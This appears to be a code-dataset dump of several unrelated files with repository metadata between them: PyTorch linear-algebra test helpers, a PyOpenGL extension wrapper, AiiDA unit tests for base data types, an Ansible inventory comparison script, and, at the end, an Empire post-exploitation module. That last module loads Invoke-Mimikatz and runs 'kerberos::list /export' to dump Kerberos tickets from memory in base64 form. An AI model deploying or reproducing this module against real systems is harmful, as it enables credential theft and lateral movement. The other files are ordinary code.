    the determinant's sign is forced to match it by negating the first row
    of any matrix whose determinant has the wrong sign.
    """
    u, s, v = A.svd()
    s.clamp_(min=min_singular_value)
    A = torch.matmul(u, torch.matmul(torch.diag_embed(s), v.transpose(-2, -1)))
    det = A.det()
    if sign is not None:
        if A.dim() == 2:
            # Single matrix: negating one row flips the determinant's sign.
            det = det.item()
            if (det < 0) ^ (sign < 0):
                A[0, :].neg_()
        else:
            # Batched case: locate the offending batch elements and negate
            # their first row.
            # NOTE(review): ``A[list(cond[i])]`` is advanced indexing, which
            # returns a copy in PyTorch, so the in-place ``neg_`` here may
            # not write back into ``A`` -- verify the batched sign fix
            # actually takes effect.
            cond = ((det < 0) ^ (sign < 0)).nonzero()
            if cond.size(0) > 0:
                for i in range(cond.size(0)):
                    A[list(cond[i])][0, :].neg_()
    return A
def random_fullrank_matrix_distinct_singular_value(matrix_size, *batch_dims,
                                                   **kwargs):
    """Return a random full-rank matrix with distinct singular values.

    The singular values are fixed to i/(matrix_size + 1) for i = 1..matrix_size,
    so they are all distinct and non-zero.  With ``silent=True`` and no LAPACK
    support, a trivial all-ones matrix is returned instead.
    """
    dtype = kwargs.get('dtype', torch.double)
    device = kwargs.get('device', 'cpu')
    if kwargs.get("silent", False) and not torch._C.has_lapack:
        return torch.ones(matrix_size, matrix_size, dtype=dtype, device=device)
    gaussian = torch.randn(batch_dims + (matrix_size, matrix_size), dtype=dtype, device=device)
    u, _, v = gaussian.svd()
    spectrum = torch.arange(1., matrix_size + 1, dtype=dtype, device=device).mul_(1.0 / (matrix_size + 1))
    sigma = spectrum.diag()
    return u.matmul(sigma.expand(batch_dims + (matrix_size, matrix_size)).matmul(v.transpose(-2, -1)))
def random_matrix(rows, columns, *batch_dims, **kwargs):
    """Return a random ``rows x columns`` matrix with controlled singular values.

    The singular values are set to i/(k + 1) for i = 1..k with
    k = min(rows, columns), making the matrix well conditioned.  With
    ``singular=True`` the smallest (and, when k > 2, also the largest)
    singular value is zeroed so the matrix becomes rank deficient.  With
    ``silent=True`` and no LAPACK support, an all-ones matrix is returned.
    """
    dtype = kwargs.get('dtype', torch.double)
    device = kwargs.get('device', 'cpu')
    silent = kwargs.get("silent", False)
    singular = kwargs.get("singular", False)
    if silent and not torch._C.has_lapack:
        return torch.ones(rows, columns, dtype=dtype, device=device)
    gaussian = torch.randn(batch_dims + (rows, columns), dtype=dtype, device=device)
    u, _, v = gaussian.svd(some=False)
    k = min(rows, columns)
    s = torch.zeros(rows, columns, dtype=dtype, device=device)
    for i in range(k):
        s[i, i] = float(i + 1) / (k + 1)
    if singular:
        # make matrix singular
        s[k - 1, k - 1] = 0
        if k > 2:
            # increase the order of singularity so that the pivoting
            # in LU factorization will be non-trivial
            s[0, 0] = 0
    return u.matmul(s.expand(batch_dims + (rows, columns)).matmul(v.transpose(-2, -1)))
def random_lowrank_matrix(rank, rows, columns, *batch_dims, **kwargs):
    """Return a random matrix of the given (low) rank as a product of two factors."""
    left = random_matrix(rows, rank, *batch_dims, **kwargs)
    right = random_matrix(rank, columns, *batch_dims, **kwargs)
    return left.matmul(right)
def random_sparse_matrix(rows, columns, density=0.01, **kwargs):
    """Return a coalesced random sparse COO matrix of roughly the given density.

    At least ``min(rows, columns)`` non-zero elements are generated.  Row
    indices cycle through the rows; column indices are a shuffled cycle, and
    values are damped away from the diagonal so the diagonal dominates.

    Fix: removed two dead locals from the original -- ``singular`` was read
    from ``kwargs`` but never used, and ``k = min(rows, columns)`` was unused.
    """
    dtype = kwargs.get('dtype', torch.double)
    device = kwargs.get('device', 'cpu')
    nonzero_elements = max(min(rows, columns), int(rows * columns * density))
    row_indices = [i % rows for i in range(nonzero_elements)]
    column_indices = [i % columns for i in range(nonzero_elements)]
    random.shuffle(column_indices)
    indices = [row_indices, column_indices]
    values = torch.randn(nonzero_elements, dtype=dtype, device=device)
    # ensure that the diagonal dominates
    values *= torch.tensor([-float(i - j)**2 for i, j in zip(*indices)], dtype=dtype, device=device).exp()
    A = torch.sparse_coo_tensor(indices, values, (rows, columns), device=device)
    return A.coalesce()
def random_sparse_pd_matrix(matrix_size, density=0.01, **kwargs):
    """Return a random sparse symmetric positive-definite matrix.

    Starts from a strictly positive diagonal (entries (i + 1)/matrix_size)
    and applies random rotations from both sides until the requested density
    is reached.  Because each rotation is applied symmetrically, the result
    stays symmetric and similar to the original diagonal, preserving its
    positive spectrum.  The matrix is built as a coordinate->value dict and
    converted to a sparse COO tensor at the end.
    """
    import math
    # Allow the caller to substitute a torch-like module via kwargs;
    # defaults to the real torch from this module's globals.
    torch = kwargs.get('torch', globals()['torch'])
    dtype = kwargs.get('dtype', torch.double)
    device = kwargs.get('device', 'cpu')
    data = dict([((i, i), float(i + 1) / matrix_size)
                 for i in range(matrix_size)])
    def multiply(data, N, i, j, cs, sn, left=True):
        # Apply a rotation by angle theta (cs = cos, sn = sin) mixing the
        # i-th and j-th columns (left=True) or rows (left=False) of the
        # matrix stored in ``data``.
        for k in range(N):
            if left:
                ik, jk = (k, i), (k, j)
            else:
                ik, jk = (i, k), (j, k)
            aik, ajk = data.get(ik, 0), data.get(jk, 0)
            aik, ajk = cs * aik + sn * ajk, -sn * aik + cs * ajk
            # Store only non-zero entries so the dict stays sparse.
            if aik:
                data[ik] = aik
            else:
                data.pop(ik, None)
            if ajk:
                data[jk] = ajk
            else:
                data.pop(jk, None)
    target_nnz = density * matrix_size * matrix_size
    while len(data) < target_nnz:
        i = random.randint(0, matrix_size - 1)
        j = random.randint(0, matrix_size - 1)
        if i != j:
            theta = random.uniform(0, 2 * math.pi)
            cs = math.cos(theta)
            sn = math.sin(theta)
            # Rotate both columns and rows with the same angle so the
            # matrix remains symmetric.
            multiply(data, matrix_size, i, j, cs, sn, left=True)
            multiply(data, matrix_size, i, j, cs, sn, left=False)
    icoords, jcoords, values = [], [], []
    for (i, j), v in sorted(data.items()):
        icoords.append(i)
        jcoords.append(j)
        values.append(v)
    indices = [icoords, jcoords]
    return torch.sparse_coo_tensor(indices, values, (matrix_size, matrix_size), dtype=dtype, device=device)
def do_test_dtypes(self, dtypes, layout, device):
    """Check that ``torch.zeros`` honors dtype/layout/device for each dtype.

    ``self`` is expected to be a TestCase-like object providing ``assertIs``
    and ``assertEqual``.  float16 is skipped.
    """
    for candidate in dtypes:
        if candidate == torch.float16:
            continue  # float16 is excluded from this check
        created = torch.zeros((2, 3), dtype=candidate, layout=layout, device=device)
        self.assertIs(candidate, created.dtype)
        self.assertIs(layout, created.layout)
        self.assertEqual(device, created.device)
def do_test_empty_full(self, dtypes, layout, device):
    """Exercise the ``empty``/``full`` factory family across dtypes.

    Covers ``torch.empty``/``torch.full``, the ``new_empty``/``new_full``
    instance factories and the ``empty_like``/``full_like`` variants,
    checking shape, dtype, layout, device, fill value and ``requires_grad``
    propagation for each combination.
    """
    shape = torch.Size([2, 3])
    def check_value(tensor, dtype, layout, device, value, requires_grad):
        # Shared assertion helper.  Intentionally shadows the outer
        # ``dtype``/``layout``/``device`` so each call site passes the
        # values it expects.  Device is only compared for CUDA tensors.
        self.assertEqual(shape, tensor.shape)
        self.assertIs(dtype, tensor.dtype)
        self.assertIs(layout, tensor.layout)
        self.assertEqual(tensor.requires_grad, requires_grad)
        if tensor.is_cuda and device is not None:
            self.assertEqual(device, tensor.device)
        if value is not None:
            fill = tensor.new(shape).fill_(value)
            self.assertEqual(tensor, fill)
    def get_int64_dtype(dtype):
        # Derive an int64 dtype from the same namespace as ``dtype``.
        # NOTE(review): for current dtypes str(dtype) is "torch.<name>", so
        # ``module`` is empty and plain torch.int64 is returned; the
        # attrgetter path presumably handles namespace-qualified dtype
        # strings -- confirm when it can actually trigger.
        module = '.'.join(str(dtype).split('.')[1:-1])
        if not module:
            return torch.int64
        return operator.attrgetter(module)(torch).int64
    default_dtype = torch.get_default_dtype()
    # device=-1 here: cpu tensors skip the device comparison in check_value.
    check_value(torch.empty(shape), default_dtype, torch.strided, -1, None, False)
    check_value(torch.full(shape, -5.), default_dtype, torch.strided, -1, None, False)
    for dtype in dtypes:
        # rg iterates requires_grad values; only floating dtypes can require grad.
        for rg in {dtype.is_floating_point, False}:
            int64_dtype = get_int64_dtype(dtype)
            v = torch.empty(shape, dtype=dtype, device=device, layout=layout, requires_grad=rg)
            check_value(v, dtype, layout, device, None, rg)
            out = v.new()
            check_value(torch.empty(shape, out=out, device=device, layout=layout, requires_grad=rg),
                        dtype, layout, device, None, rg)
            check_value(v.new_empty(shape), dtype, layout, device, None, False)
            check_value(v.new_empty(shape, dtype=int64_dtype, device=device, requires_grad=False),
                        int64_dtype, layout, device, None, False)
            check_value(torch.empty_like(v), dtype, layout, device, None, False)
            check_value(torch.empty_like(v, dtype=int64_dtype, layout=layout, device=device, requires_grad=False),
                        int64_dtype, layout, device, None, False)
            # full/full_like: float16 and sparse layouts are excluded.
            if dtype is not torch.float16 and layout != torch.sparse_coo:
                fv = 3
                v = torch.full(shape, fv, dtype=dtype, layout=layout, device=device, requires_grad=rg)
                check_value(v, dtype, layout, device, fv, rg)
                check_value(v.new_full(shape, fv + 1), dtype, layout, device, fv + 1, False)
                out = v.new()
                check_value(torch.full(shape, fv + 2, out=out, device=device, layout=layout, requires_grad=rg),
                            dtype, layout, device, fv + 2, rg)
                check_value(v.new_full(shape, fv + 3, dtype=int64_dtype, device=device, requires_grad=False),
                            int64_dtype, layout, device, fv + 3, False)
                check_value(torch.full_like(v, fv + 4), dtype, layout, device, fv + 4, False)
                check_value(torch.full_like(v, fv + 5,
                            dtype=int64_dtype, layout=layout, device=device, requires_grad=False),
                            int64_dtype, layout, device, fv + 5, False)
# Names of tests known to be extremely slow; presumably consulted elsewhere
# (the set is only defined here) to skip or deprioritize them.  Membership is
# by bare test method name.
THESE_TAKE_WAY_TOO_LONG = {
    'test_Conv3d_groups',
    'test_conv_double_backward',
    'test_conv_double_backward_groups',
    'test_Conv3d_dilated',
    'test_Conv3d_stride_padding',
    'test_Conv3d_dilated_strided',
    'test_Conv3d',
    'test_Conv2d_dilated',
    'test_ConvTranspose3d_dilated',
    'test_ConvTranspose2d_dilated',
    'test_snli',
    'test_Conv2d',
    'test_Conv2d_padding',
    'test_ConvTranspose2d_no_bias',
    'test_ConvTranspose2d',
    'test_ConvTranspose3d',
    'test_Conv2d_no_bias',
    'test_matmul_4d_4d',
    'test_multinomial_invalid_probs',
}
# Absolute path of the test script currently being executed, or None if it
# has not been (or could not be) determined.
running_script_path = None


def set_running_script_path():
    """Record the absolute, symlink-resolved path of the running script.

    The value is stored in the module-level ``running_script_path`` so that
    ``check_test_defined_in_running_script`` can verify test provenance.
    Best-effort: any failure leaves the previous value untouched.
    """
    global running_script_path
    try:
        candidate = os.path.abspath(os.path.realpath(sys.argv[0]))
        if candidate.endswith('.py'):  # skip if the running file is not a script
            running_script_path = candidate
    except Exception:
        pass
def check_test_defined_in_running_script(test_case):
    """Assert that ``test_case``'s class is defined in the running script.

    Guards against accidentally importing a ``unittest.TestCase`` from a
    different file.  No-op when no running script path has been recorded.
    """
    if running_script_path is None:
        return
    defining_file = os.path.abspath(os.path.realpath(inspect.getfile(test_case.__class__)))
    assert defining_file == running_script_path, "Class of loaded TestCase \"{}\" " \
        "is not defined in the running script \"{}\", but in \"{}\". Did you " \
        "accidentally import a unittest.TestCase from another file?".format(
            test_case.id(), running_script_path, defining_file)
def load_tests(loader, tests, pattern):
    """Custom ``load_tests`` protocol hook that validates test provenance.

    Flattens the discovered test groups into a single suite, asserting along
    the way that each test is defined in the script currently being run.
    """
    set_running_script_path()
    suite = unittest.TestSuite()
    for group in tests:
        for test in group:
            check_test_defined_in_running_script(test)
            suite.addTest(test)
    return suite
class BytesIOContext(io.BytesIO):
    """``io.BytesIO`` usable as a context manager that does NOT close on exit.

    Unlike the base class, leaving the ``with`` block keeps the buffer open
    so its contents can still be read afterwards.
    """

    def __enter__(self):
        return self

    def __exit__(self, *args):
        # Deliberately do not close: callers inspect the buffer afterwards.
        pass
def _assertGradAndGradgradChecks(test_case, apply_fn, inputs):
    """Run both ``gradcheck`` and ``gradgradcheck`` on ``apply_fn``/``inputs``
    and fail ``test_case`` if either returns False."""
    # call assert function rather than returning a bool since it's nicer
    # to surface a failure as a test assertion than as a return value
    test_case.assertTrue(gradcheck(apply_fn, inputs))
    test_case.assertTrue(gradgradcheck(apply_fn, inputs))
# Legacy per-dtype comparison tolerances.  The _DONTUSE suffix signals that
# new code should not rely on this table; it remains for existing tests.
dtype2prec_DONTUSE = {torch.float: 1e-5,
                      torch.double: 1e-5,
                      torch.half: 1e-2,
                      torch.bfloat16: 1e-1}
| true | true |
f70ff7b5f910ec0e2e5f617995f5bf4ccc679ff6 | 1,220 | py | Python | deep-rl/lib/python2.7/site-packages/OpenGL/GLES2/EXT/robustness.py | ShujaKhalid/deep-rl | 99c6ba6c3095d1bfdab81bd01395ced96bddd611 | [
"MIT"
] | 3 | 2019-04-01T11:03:04.000Z | 2019-12-31T02:17:15.000Z | deep-rl/lib/python2.7/site-packages/OpenGL/GLES2/EXT/robustness.py | ShujaKhalid/deep-rl | 99c6ba6c3095d1bfdab81bd01395ced96bddd611 | [
"MIT"
] | 1 | 2021-02-08T20:34:54.000Z | 2021-02-08T20:34:54.000Z | deep-rl/lib/python2.7/site-packages/OpenGL/GLES2/EXT/robustness.py | ShujaKhalid/deep-rl | 99c6ba6c3095d1bfdab81bd01395ced96bddd611 | [
"MIT"
] | 1 | 2018-06-07T22:31:11.000Z | 2018-06-07T22:31:11.000Z | '''OpenGL extension EXT.robustness
This module customises the behaviour of the
OpenGL.raw.GLES2.EXT.robustness to provide a more
Python-friendly API
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/EXT/robustness.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.EXT.robustness import *
from OpenGL.raw.GLES2.EXT.robustness import _EXTENSION_NAME
def glInitRobustnessEXT():
    '''Return boolean indicating whether this extension is available.

    Queries the PyOpenGL extension registry for EXT_robustness support on
    the current GL implementation.
    '''
    from OpenGL import extensions
    return extensions.hasGLExtension( _EXTENSION_NAME )
# The wrappers below adjust PyOpenGL's array handling for the sized
# ("n"-suffixed) robustness entry points: an input array size of None
# apparently disables size validation, so (as the autogenerated notes say)
# the caller's buffer size is NOT checked against the bufSize argument.
# INPUT glReadnPixelsEXT.data size not checked against bufSize
glReadnPixelsEXT=wrapper.wrapper(glReadnPixelsEXT).setInputArraySize(
    'data', None
)
# INPUT glGetnUniformfvEXT.params size not checked against bufSize
glGetnUniformfvEXT=wrapper.wrapper(glGetnUniformfvEXT).setInputArraySize(
    'params', None
)
# INPUT glGetnUniformivEXT.params size not checked against bufSize
glGetnUniformivEXT=wrapper.wrapper(glGetnUniformivEXT).setInputArraySize(
    'params', None
)
### END AUTOGENERATED SECTION | 35.882353 | 73 | 0.811475 | from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.EXT.robustness import *
from OpenGL.raw.GLES2.EXT.robustness import _EXTENSION_NAME
def glInitRobustnessEXT():
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
glReadnPixelsEXT=wrapper.wrapper(glReadnPixelsEXT).setInputArraySize(
'data', None
)
glGetnUniformfvEXT=wrapper.wrapper(glGetnUniformfvEXT).setInputArraySize(
'params', None
)
glGetnUniformivEXT=wrapper.wrapper(glGetnUniformivEXT).setInputArraySize(
'params', None
)
| true | true |
f70ff8b39f836eb8b184cb1a2cede38cdd93a78e | 6,628 | py | Python | tests/orm/nodes/data/test_base.py | azadoks/aiida-core | b806b7fef8fc79090deccfe2019b77cb922e0581 | [
"MIT",
"BSD-3-Clause"
] | 180 | 2019-07-12T07:45:26.000Z | 2022-03-22T13:16:57.000Z | tests/orm/nodes/data/test_base.py | azadoks/aiida-core | b806b7fef8fc79090deccfe2019b77cb922e0581 | [
"MIT",
"BSD-3-Clause"
] | 2,325 | 2019-07-04T13:41:44.000Z | 2022-03-31T12:17:10.000Z | tests/orm/nodes/data/test_base.py | azadoks/aiida-core | b806b7fef8fc79090deccfe2019b77cb922e0581 | [
"MIT",
"BSD-3-Clause"
] | 88 | 2019-07-06T01:42:39.000Z | 2022-03-18T14:20:09.000Z | # -*- coding: utf-8 -*-
###########################################################################
# Copyright (c), The AiiDA team. All rights reserved. #
# This file is part of the AiiDA code. #
# #
# The code is hosted on GitHub at https://github.com/aiidateam/aiida-core #
# For further information on the license, see the LICENSE.txt file #
# For further information please visit http://www.aiida.net #
###########################################################################
# pylint: disable=invalid-name
"""Tests for :class:`aiida.orm.nodes.data.base.BaseType` classes."""
import operator
import pytest
from aiida.orm import Bool, Float, Int, NumericType, Str, load_node
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize(
    'node_type, default, value', [
        (Bool, False, True),
        (Int, 0, 5),
        (Float, 0.0, 5.5),
        (Str, '', 'a'),
    ]
)
def test_create(node_type, default, value):
    """Verify a ``BaseType`` node defaults correctly and accepts an explicit value."""
    assert node_type().value == default
    assert node_type(value).value == value
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize('node_type', [Bool, Float, Int, Str])
def test_store_load(node_type):
    """Round-trip a ``BaseType`` node through storing and loading."""
    original = node_type()
    original.store()
    reloaded = load_node(original.pk)
    assert original.value == reloaded.value
@pytest.mark.usefixtures('clear_database_before_test')
def test_modulo():
    """Test the ``Int`` modulo operator against nodes and Python ints."""
    dividend = Int(12)
    divisor = Int(10)
    # node % node, node % native, native % node
    for lhs, rhs in ((dividend, divisor), (dividend, 10), (12, divisor)):
        remainder = lhs % rhs
        assert remainder == 2
        assert isinstance(remainder, NumericType)
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize('node_type, a, b', [
    (Int, 3, 5),
    (Float, 1.2, 5.5),
])
def test_add(node_type, a, b):
    """Test addition between nodes, and between nodes and Python natives."""
    node_a = node_type(a)
    node_b = node_type(b)
    expected = a + b

    def verify(outcome):
        assert isinstance(outcome, node_type)
        assert outcome.value == expected

    verify(node_a + node_b)   # node + node
    verify(node_a + b)        # node + native
    verify(a + node_b)        # native + node

    accumulator = node_type(a)
    accumulator += node_b     # in-place addition
    verify(accumulator)
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize('node_type, a, b', [
    (Int, 3, 5),
    (Float, 1.2, 5.5),
])
def test_multiplication(node_type, a, b):
    """Test multiplication between nodes, and between nodes and Python natives."""
    node_a = node_type(a)
    node_b = node_type(b)
    expected = a * b

    def verify(outcome):
        assert isinstance(outcome, node_type)
        assert outcome.value == expected

    verify(node_a * node_b)   # node * node
    verify(node_a * b)        # node * native
    verify(a * node_b)        # native * node

    accumulator = node_type(a)
    accumulator *= node_b     # in-place multiplication
    verify(accumulator)
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize('node_type, a, b', [
    (Int, 3, 5),
    (Float, 1.2, 5.5),
])
def test_division(node_type, a, b):
    """Test the ``BaseType`` true division operator.

    True division always yields a ``Float`` node, regardless of the operand
    node type.

    Fix: the ``usefixtures`` decorator was applied twice (above and below the
    ``parametrize``); the redundant duplicate has been removed.
    """
    node_a = node_type(a)
    node_b = node_type(b)

    result = node_a / node_b
    assert result == a / b
    assert isinstance(result, Float)  # Should be a `Float` for both node types
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize('node_type, a, b', [
    (Int, 3, 5),
    (Float, 1.2, 5.5),
])
def test_division_integer(node_type, a, b):
    """Test the ``BaseType`` floor (integer) division operator.

    Unlike true division, floor division preserves the operand node type.

    Fix: the ``usefixtures`` decorator was applied twice (above and below the
    ``parametrize``); the redundant duplicate has been removed.
    """
    node_a = node_type(a)
    node_b = node_type(b)

    result = node_a // node_b
    assert result == a // b
    assert isinstance(result, node_type)
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize('node_type, base, power', [
    (Int, 5, 2),
    (Float, 3.5, 3),
])
def test_power(node_type, base, power):
    """Test the exponentiation operator between nodes."""
    outcome = node_type(base)**node_type(power)
    assert outcome == base**power
    assert isinstance(outcome, node_type)
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize('node_type, a, b', [
    (Int, 5, 2),
    (Float, 3.5, 3),
])
def test_modulus(node_type, a, b):
    """Test the modulus operator between nodes and natives."""
    node_a = node_type(a)
    node_b = node_type(b)
    expected = a % b
    # node % node, node % native, native % node all preserve the node type.
    for remainder in (node_a % node_b, node_a % b, a % node_b):
        assert remainder == expected
        assert isinstance(remainder, node_type)
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize(
    'opera', [
        operator.add, operator.mul, operator.pow, operator.lt, operator.le, operator.gt, operator.ge, operator.iadd,
        operator.imul
    ]
)
def test_operator(opera):
    """Test mixed-type binary operations between ``Int`` and ``Float`` objects."""
    node_float = Float(2.2)
    node_int = Int(3)
    # Exercise both operand orders.
    for lhs, rhs in [(node_float, node_int), (node_int, node_float)]:
        outcome = opera(lhs, rhs)
        expected = opera(lhs.value, rhs.value)
        # The result node should wrap the same Python type as the native result.
        assert outcome._type == type(expected)  # pylint: disable=protected-access
        assert outcome == expected
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize('node_type, a, b', [
    (Bool, False, True),
    (Int, 2, 5),
    (Float, 2.5, 5.5),
    (Str, 'a', 'b'),
])
def test_equality(node_type, a, b):
    """Test equality comparison for the base types."""
    node = node_type(a)
    node_clone = node_type(a)
    other = node_type(b)

    # Comparison against Python native values.
    assert node == a
    assert node != b

    # Comparison against other ``BaseType`` nodes.
    assert node == node_clone
    assert node != other
| 28.817391 | 116 | 0.628093 | true | true | |
f70ff8c17dab8983b21b6b77a9aa402599833f23 | 2,391 | py | Python | lib/python3.8/site-packages/ansible_collections/community/general/tests/integration/targets/inventory_kubevirt/inventory_diff.py | cjsteel/python3-venv-ansible-2.10.5 | c95395c4cae844dc66fddde9b4343966f4b2ecd5 | [
"Apache-1.1"
] | 5 | 2020-12-16T21:42:09.000Z | 2022-03-28T16:04:32.000Z | .ansible/collections/ansible_collections/community/general/tests/integration/targets/inventory_kubevirt/inventory_diff.py | chronicc/proving-ground | 3e392122a05fb8383a3700954baebb0df330e9e3 | [
"MIT"
] | null | null | null | .ansible/collections/ansible_collections/community/general/tests/integration/targets/inventory_kubevirt/inventory_diff.py | chronicc/proving-ground | 3e392122a05fb8383a3700954baebb0df330e9e3 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import json
import sys
def check_hosts(contrib, plugin):
    """Assert both inventories expose the same hosts; return the sorted lists."""
    contrib_hosts = sorted(contrib['_meta']['hostvars'])
    plugin_hosts = sorted(plugin['_meta']['hostvars'])
    assert contrib_hosts == plugin_hosts
    return contrib_hosts, plugin_hosts
def check_groups(contrib, plugin):
    """Assert the plugin output contains every group from the contrib script.

    The plugin is allowed to have extra groups; only missing ones fail.
    Returns both group sets.
    """
    contrib_groups = set(contrib)
    plugin_groups = set(plugin)
    missing = contrib_groups - plugin_groups
    if missing:
        print("groups: %s are missing from the plugin" % missing)
    assert not missing
    return contrib_groups, plugin_groups
def check_host_vars(key, value, plugin, host):
    """Assert one contrib-script host variable is reproducible from the plugin.

    ``ec2_tag_*`` keys are looked up inside the plugin's ``tags`` dict; all
    other keys are compared directly against the plugin's hostvars.
    """
    if key.startswith('ec2_tag'):
        # tags are a dict in the plugin
        print('assert tag', key, value)
        host_vars = plugin['_meta']['hostvars'][host]
        assert 'tags' in host_vars, 'b file does not have tags in host'
        tags = host_vars['tags']
        tag_name = key.replace('ec2_tag_', '')
        assert tag_name in tags, '%s tag not in b file host tags' % tag_name
        assert value == tags[tag_name], '%s != %s' % (value, tags[tag_name])
    else:
        host_vars = plugin['_meta']['hostvars'][host]
        print('assert var', key, value, key in host_vars, host_vars.get(key))
        assert key in host_vars, "%s not in b's %s hostvars" % (key, host)
        assert value == host_vars[key], "%s != %s" % (value, host_vars[key])
def main():
    """Diff a contrib inventory script's JSON output against a plugin's.

    Usage: <script> <contrib_output.json> <plugin_output.json>.  Raises
    AssertionError on the first discrepancy found between the two documents.
    """
    # a should be the source of truth (the script output)
    a = sys.argv[1]
    # b should be the thing to check (the plugin output)
    b = sys.argv[2]
    with open(a, 'r') as f:
        adata = json.loads(f.read())
    with open(b, 'r') as f:
        bdata = json.loads(f.read())
    # Echo both documents so a failing assertion can be debugged from the log.
    print(adata)
    print(bdata)
    # all hosts should be present obviously
    ahosts, bhosts = check_hosts(adata, bdata)
    # all groups should be present obviously
    agroups, bgroups = check_groups(adata, bdata)
    # check host vars can be reconstructed
    for ahost in ahosts:
        contrib_host_vars = adata['_meta']['hostvars'][ahost]
        for key, value in contrib_host_vars.items():
            check_host_vars(key, value, bdata, ahost)
if __name__ == "__main__":
    main()
| 33.676056 | 125 | 0.649101 |
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import json
import sys
def check_hosts(contrib, plugin):
contrib_hosts = sorted(contrib['_meta']['hostvars'].keys())
plugin_hosts = sorted(plugin['_meta']['hostvars'].keys())
assert contrib_hosts == plugin_hosts
return contrib_hosts, plugin_hosts
def check_groups(contrib, plugin):
contrib_groups = set(contrib.keys())
plugin_groups = set(plugin.keys())
missing_groups = contrib_groups.difference(plugin_groups)
if missing_groups:
print("groups: %s are missing from the plugin" % missing_groups)
assert not missing_groups
return contrib_groups, plugin_groups
def check_host_vars(key, value, plugin, host):
if key.startswith('ec2_tag'):
print('assert tag', key, value)
assert 'tags' in plugin['_meta']['hostvars'][host], 'b file does not have tags in host'
btags = plugin['_meta']['hostvars'][host]['tags']
tagkey = key.replace('ec2_tag_', '')
assert tagkey in btags, '%s tag not in b file host tags' % tagkey
assert value == btags[tagkey], '%s != %s' % (value, btags[tagkey])
else:
print('assert var', key, value, key in plugin['_meta']['hostvars'][host], plugin['_meta']['hostvars'][host].get(key))
assert key in plugin['_meta']['hostvars'][host], "%s not in b's %s hostvars" % (key, host)
assert value == plugin['_meta']['hostvars'][host][key], "%s != %s" % (value, plugin['_meta']['hostvars'][host][key])
def main():
# a should be the source of truth (the script output)
a = sys.argv[1]
# b should be the thing to check (the plugin output)
b = sys.argv[2]
with open(a, 'r') as f:
adata = json.loads(f.read())
with open(b, 'r') as f:
bdata = json.loads(f.read())
print(adata)
print(bdata)
# all hosts should be present obviously
ahosts, bhosts = check_hosts(adata, bdata)
# all groups should be present obviously
agroups, bgroups = check_groups(adata, bdata)
# check host vars can be reconstructed
for ahost in ahosts:
contrib_host_vars = adata['_meta']['hostvars'][ahost]
for key, value in contrib_host_vars.items():
check_host_vars(key, value, bdata, ahost)
if __name__ == "__main__":
main()
| true | true |
f70ff9f7bc88d87ca48ff19099b4239c3f5439c9 | 3,679 | py | Python | lib/modules/powershell/credentials/mimikatz/extract_tickets.py | RedBulletTooling/Empire | 3f4146bf8221ad3d2dcbe8ef4a61dabd66b86e0d | [
"BSD-3-Clause"
] | 3 | 2019-11-30T06:12:45.000Z | 2021-06-10T05:35:33.000Z | lib/modules/powershell/credentials/mimikatz/extract_tickets.py | RedBulletTooling/Empire | 3f4146bf8221ad3d2dcbe8ef4a61dabd66b86e0d | [
"BSD-3-Clause"
] | 20 | 2020-03-11T03:58:21.000Z | 2020-03-12T03:59:38.000Z | lib/modules/powershell/credentials/mimikatz/extract_tickets.py | RedBulletTooling/Empire | 3f4146bf8221ad3d2dcbe8ef4a61dabd66b86e0d | [
"BSD-3-Clause"
] | null | null | null | from __future__ import print_function
from builtins import str
from builtins import object
from lib.common import helpers
import threading
class Module(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-Mimikatz extract kerberos tickets.',
'Author': ['@JosephBialek', '@gentilkiwi'],
'Description': ("Runs PowerSploit's Invoke-Mimikatz function "
"to extract kerberos tickets from memory in base64-encoded form."),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : True,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': [
'http://clymb3r.wordpress.com/',
'http://blog.gentilkiwi.com'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# used to protect self.http and self.mainMenu.conn during threaded listener access
self.lock = threading.Lock()
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
# this might not be necessary. Could probably be achieved by just callingg mainmenu.get_db but all the other files have
# implemented it in place. Might be worthwhile to just make a database handling file -Hubbl3
def get_db_connection(self):
"""
Returns the cursor for SQLlite DB
"""
self.lock.acquire()
self.mainMenu.conn.row_factory = None
self.lock.release()
return self.mainMenu.conn
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "Invoke-Mimikatz -Command '\"standard::base64\" \"kerberos::list /export\"'"
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
